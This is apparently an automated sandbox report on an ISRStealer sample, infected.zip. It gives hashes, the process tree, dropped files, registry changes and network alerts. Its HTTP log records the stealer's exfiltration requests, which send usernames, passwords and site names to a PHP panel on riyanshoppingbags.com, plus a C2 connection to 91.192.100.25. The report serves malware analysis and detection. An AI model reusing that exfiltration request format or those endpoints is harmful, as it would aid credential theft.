analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

infected.zip

Full analysis: https://app.any.run/tasks/96f1bd33-073c-44e6-8564-810fcf1d24b9
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: December 06, 2018, 09:18:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
stealer
trojan
isrstealer
opendir
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

DCD541818FA628058E8961F828757312

SHA1:

2F8BE1B3368F6B45CFAB1ED31D7A2AE9E6816FE9

SHA256:

D74EB6A572196920DC5E0D980528ED0B7EEEAB38AFD34927B0281438E16F8C40

SSDEEP:

12288:XQ2Ju/5mi6InaejpjEYBC9DsyxHWeZ4nv9Op4+k8X8izMgwl5lv:X7JImynaqNWDhxHWY+VoHlM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Sample.exe (PID: 4048)
      • Server.exe (PID: 2480)
      • Server.exe (PID: 4052)
      • Server.exe (PID: 1960)
      • Sample.exe (PID: 4064)
    • Actions looks like stealing of personal data

      • Server.exe (PID: 4052)
      • Server.exe (PID: 1960)
      • Server.exe (PID: 2480)
    • Stealing of credential data

      • Server.exe (PID: 4052)
      • Server.exe (PID: 1960)
    • Sending of credential data detected

      • Server.exe (PID: 2480)
    • Connects to CnC server

      • Server.exe (PID: 2480)
    • ISRSTEALER was detected

      • Server.exe (PID: 2480)
    • Changes the autorun value in the registry

      • Sample.exe (PID: 4064)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • Sample.exe (PID: 4048)
      • WinRAR.exe (PID: 2848)
    • Starts CMD.EXE for commands execution

      • Sample.exe (PID: 4048)
    • Loads DLL from Mozilla Firefox

      • Server.exe (PID: 4052)
    • Application launched itself

      • Server.exe (PID: 2480)
      • Sample.exe (PID: 4048)
    • Connects to unusual port

      • Sample.exe (PID: 4064)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • WinRAR.exe (PID: 2848)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: Sample.exe
ZipUncompressedSize: 1012736
ZipCompressedSize: 647662
ZipCRC: 0x3abebbda
ZipModifyDate: 2018:11:29 15:41:25
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
7
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winrar.exe sample.exe cmd.exe no specs #ISRSTEALER server.exe server.exe server.exe sample.exe

Process information

PID
CMD
Path
Indicators
Parent process
2848"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\infected.zip"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
4048"C:\Users\admin\Desktop\Sample.exe" C:\Users\admin\Desktop\Sample.exe
explorer.exe
User:
admin
Company:
Gannett Co., Inc.
Integrity Level:
MEDIUM
Description:
Static compression module
Exit code:
0
Version:
11.3.13.4
Modules
Images
c:\users\admin\desktop\sample.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3112"C:\Windows\System32\cmd.exe" /c, "C:\Users\admin\Desktop\Server.exe"C:\Windows\System32\cmd.exeSample.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2480"C:\Users\admin\Desktop\Server.exe"C:\Users\admin\Desktop\Server.exe
cmd.exe
User:
admin
Company:
SIMPLY THE WORST
Integrity Level:
MEDIUM
Exit code:
0
Version:
0.04
Modules
Images
c:\users\admin\desktop\server.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
4052 /scomma "C:\Users\admin\AppData\Local\Temp\IHMRpgISlO.ini"C:\Users\admin\Desktop\Server.exe
Server.exe
User:
admin
Company:
SIMPLY THE WORST
Integrity Level:
MEDIUM
Exit code:
0
Version:
0.04
Modules
Images
c:\users\admin\desktop\server.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
1960 /scomma "C:\Users\admin\AppData\Local\Temp\Bl1EuN6VhN.ini"C:\Users\admin\Desktop\Server.exe
Server.exe
User:
admin
Company:
SIMPLY THE WORST
Integrity Level:
MEDIUM
Exit code:
0
Version:
0.04
Modules
Images
c:\users\admin\desktop\server.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
4064"C:\Users\admin\Desktop\Sample.exe"C:\Users\admin\Desktop\Sample.exe
Sample.exe
User:
admin
Company:
Gannett Co., Inc.
Integrity Level:
MEDIUM
Description:
Static compression module
Version:
11.3.13.4
Modules
Images
c:\users\admin\desktop\sample.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
Total events
565
Read events
521
Write events
44
Delete events
0

Modification events

(PID) Process:(2848) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2848) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(2848) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2848) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\infected.zip
(PID) Process:(2848) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2848) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2848) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2848) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2848) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(2848) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
Executable files
2
Suspicious files
0
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
4048Sample.exeC:\Users\admin\Documents\Server.txttext
MD5:F64B5BFB229EE6486BD136F8973CE886
SHA256:F9351C65287441FC9BD7757150A6A7DB53AFD011108E153E3A48DCB07E457218
4052Server.exeC:\Users\admin\AppData\Local\Temp\IHMRpgISlO.initext
MD5:9A47AD9735185C35A1C7867976CB1884
SHA256:788D0D9A0E7E5986FEAD2D9F1DC0FA4A5E04386ED774522DB766A1B01B40C932
4048Sample.exeC:\Users\admin\Desktop\Server.exeexecutable
MD5:E8F2B14AB5381C021C8085C43BE1804B
SHA256:7557FABFF96AD819525F43A133680CC1EF3ACB61A5F8E3DF4C385B6244AD6FED
2848WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2848.43266\Sample.exeexecutable
MD5:09F7912493D7B995E0D765387B8CE2A1
SHA256:5927E4D65F85B8656396C8F02379F3954D38F19AC63E9D00596F666F6DC796AB
1960Server.exeC:\Users\admin\AppData\Local\Temp\Bl1EuN6VhN.initext
MD5:694A49A611C108EB6D3E51D8A5494237
SHA256:B0FF9408736D6CA22B705CE872ABD00E48712634870236B82F91B2E0D09BAA78
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2480
Server.exe
GET
148.251.31.172:80
http://riyanshoppingbags.com/skins/betpla/PHP/index.php?action=add&[email protected]&password=honeypass356&app=IE%207-9&pcname=USER-PC&sitename=https://m.facebook.com/
DE
malicious
2480
Server.exe
GET
200
148.251.31.172:80
http://riyanshoppingbags.com/skins/betpla/PHP/index.php?action=add&[email protected]&password=honeypass356&app=Chrome&pcname=USER-PC&sitename=https://m.facebook.com/
DE
malicious
2480
Server.exe
GET
200
148.251.31.172:80
http://riyanshoppingbags.com/skins/betpla/PHP/index.php?action=add&[email protected]&password=honeypass356&app=MS%20Outlook%202002/2003/2007&pcname=USER-PC&sitename=192.168.1.1
DE
malicious
2480
Server.exe
GET
148.251.31.172:80
http://riyanshoppingbags.com/skins/betpla/PHP/index.php?action=add&[email protected]&password=honeypass356&app=Opera&pcname=USER-PC&sitename=https://www.facebook.com
DE
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2480
Server.exe
148.251.31.172:80
riyanshoppingbags.com
Hetzner Online GmbH
DE
malicious
4064
Sample.exe
91.192.100.25:3369
SOFTplus Entwicklungen GmbH
CH
malicious

DNS requests

Domain
IP
Reputation
riyanshoppingbags.com
  • 148.251.31.172
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2480
Server.exe
A Network Trojan was detected
ET TROJAN ISRStealer Checkin
2480
Server.exe
A Network Trojan was detected
ET USER_AGENTS Suspicious User-Agent (HardCore Software For)
2480
Server.exe
A Network Trojan was detected
ET TROJAN ISRStealer Checkin
2480
Server.exe
A Network Trojan was detected
ET USER_AGENTS Suspicious User-Agent (HardCore Software For)
2480
Server.exe
A Network Trojan was detected
ET TROJAN ISRStealer Checkin
2480
Server.exe
A Network Trojan was detected
ET USER_AGENTS Suspicious User-Agent (HardCore Software For)
2480
Server.exe
A Network Trojan was detected
ET TROJAN ISRStealer Checkin
2480
Server.exe
A Network Trojan was detected
ET USER_AGENTS Suspicious User-Agent (HardCore Software For)
Process
Message
Sample.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1391
Sample.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\identityauthority.cpp, line 278
Sample.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1391
Sample.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\identityauthority.cpp, line 278
Sample.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1391
Sample.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\identityauthority.cpp, line 278
Sample.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1391
Sample.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\identityauthority.cpp, line 278